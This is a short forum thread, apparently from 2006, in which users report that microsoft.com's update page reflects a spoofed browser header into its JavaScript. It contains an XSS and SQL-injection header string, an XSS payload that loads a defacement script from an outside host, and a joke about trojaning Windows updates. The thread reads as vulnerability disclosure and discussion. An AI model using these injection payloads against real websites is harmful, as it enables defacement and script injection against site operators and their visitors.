Topic: "www.microsoft.com - SQL-Injection?" (page 1 of 1)

1
Author Post
theblacksheep
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
Hi,

I was looking for some updates and so I visited the microsoft.com web site.
As you might know do I always fake my HTTP headers in such a way, that they are likely to create SQL errors when used unfiltered in SQL statements.

For example my Browser:

Shadow("><script type="text/javascript>alert('hello');</script><"'UNION/*)

Then just go to microsoft.com and visit the link "Microsoft Update".

QuoteQuote from Microsoft:
<"'UNION/*)".toLowerCase(); var g_sDisableWGACheck = "false"; var g_sWGACOAReturnValues ="0,6-Success;1,7,8,9,10-ErrPage1;2-ErrPage2;3-ErrPage3;4,5-ErrPage4"; var g_bWGAEnablePingback = true; var g_sWGAMinVersion = "1,3,254,0"; var conLangCode = "en"; var g_sQSProductName = '';




I just wanted to tell you about this :-)

theblacksheep
Edited by theblacksheep on 02.01.2006 11:53:00
private message EMail Website
mxn
groupmastergroupmastergroupmastergroupmaster
neat discovery :)
checkout the source if there is some html or just plaintext
private message Website
quangntenemy
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
I think it's just an XSS bug ;)
QuoteQuote:
test";</script></head><body><script src="http://www.freewebs.com/quangntenemy/xssdefaced.js"></script></body></html>

private message EMail Website
theblacksheep
groupmastergroupmastergroupmastergroupmastergroupmastergroupmastergroupmaster
Here it goes:

linkSource code of default.aspx

Maybe it is really just a XSS bug.
@all BlackHats: Time to prepare a Windows update with a trojan it it :pc1:
Edited by theblacksheep on 02.01.2006 13:37:48
private message EMail Website

Topic: "www.microsoft.com - SQL-Injection?" (page 1 of 1)

1